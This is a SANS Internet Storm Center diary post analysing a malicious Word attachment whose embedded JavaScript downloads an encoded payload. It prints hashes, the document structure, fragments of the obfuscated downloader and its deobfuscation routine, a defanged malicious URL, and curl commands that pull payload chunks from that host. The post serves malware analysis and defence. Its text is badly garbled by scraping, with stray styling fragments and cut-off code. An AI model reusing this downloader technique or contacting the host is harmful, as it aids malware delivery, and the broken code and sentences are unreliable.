Another Day, Another Obfuscation Technique, (Fri, Apr 28th)

We got many samples from our readers and wethank them for this. It helps us to find how attackers are improving their techniques to bypass security controls and to fool the victims. Often the provided samples are coming from common waves of spam but, sometimes, they are interesting. I padding:5px 10px”>
viper Order-complete.docx info
+———-+———————————————————————————————————————————-+
| Key | Value |
+———-+———————————————————————————————————————————-+
| Name | Order-complete.docx |
| Tags | whiteknight |
| Path | /home/nonroot/.viper/binaries/2/9/d/c/29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 |
| Size | 17034 |
| Type | Microsoft Word 2007+ |
| Mime | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| MD5 | 64b342c80a7f9e7ec1c85f1f0059feb3 |
| SHA1 | 5e0b0c0ed682139588f61f37eaf789003590b66a |
| SHA256 | 29dcb52fc33dd94a4e2eb866ad3e86ec60f3414372dbd557308d6c59b7131ae3 |
| SHA512 | ae709954da0b03a85323e180961a393820a4289a52e1ae752f499a58947863df86cbb9f66a6a7fe5478f9b64278f055f10bc6ba1871df28f882f71d756cbae48 |
| SSdeep | 384:TyD28Wf7rR+4pMyFvt3nr+Jjgozm3BTmDU:FpzrgeRrqXgMU |
| CRC32 | 58486E87 |
| Parent | |
| Children | 25545563f98f99ee0274c2698eefbfec91e176d2165f755ca7ef455b3d468016, |
+———-+———————————————————————————————————————————-+
viper Order-complete.docx padding:5px 10px”>
Sub Auto_Open()
Msgbox Welcome to SANS ISC! padding:5px 10px”>
viper Order-complete.docx office -s
[*] Document Structure
– [Content_Types].xml
– _rels/.rels
– word/_rels/document.xml.rels
– word/document.xml
– word/media/image1.emf
– word/embeddings/oleObject1.bin
– word/theme/theme1.xml
– word/settings.xml
– word/webSettings.xml
– docProps/core.xml
– word/styles.xml
– word/fontTable.xml
– docProps/app.xml

The Javascript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%LocalTempOrder complete.js, it is executed and download a malicious PE file. Let
try {
c.open(deobfus(—-uFuwwu,1), deobfus(—-qqq:qLU:qjqtqqq:UtF_qF_,1)+?ff + loop,

}
var data = c.responseText.indexOf(||| padding:5px 10px”>
hxxp://dev.watershowbranson.com/info.php?ffX

x being incremented by the loop.

When you try to access manually this URL, you get a different content depending on x padding:5px 10px”>
$ curl hxxp://dev.watershowbranson.com/info.php?ff1
7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695…(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff2
7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018…(removed)
$ curl hxxp://dev.watershowbranson.com/info.php?ff3
9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116…(removed)

Note the |||
var daddbdbfeed = ebcebafed
}

function deobfus(s,key){
var fcddcdfcfcfc = $d.JkT0_gOQ7F:%(*Z,-fCIximY^DLva+WB@4u8HX)pbNhSGsloe5w
var buffer = abcafefaddd
if (cfbbadafdfabf0) {
padding:5px 10px”>
var foo = deobfus(—-qqq:qLU:qjqtqqq:UtF_qF_ padding:5px 10px”>
hxxp://dev.watershowbranson.com/info.php

In this example, we have multiple payloads downloaded with their associated key (no direct PE file), we dont see XOR encryption or Base64 encoding. Nothingsuspicious, just plain text!

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.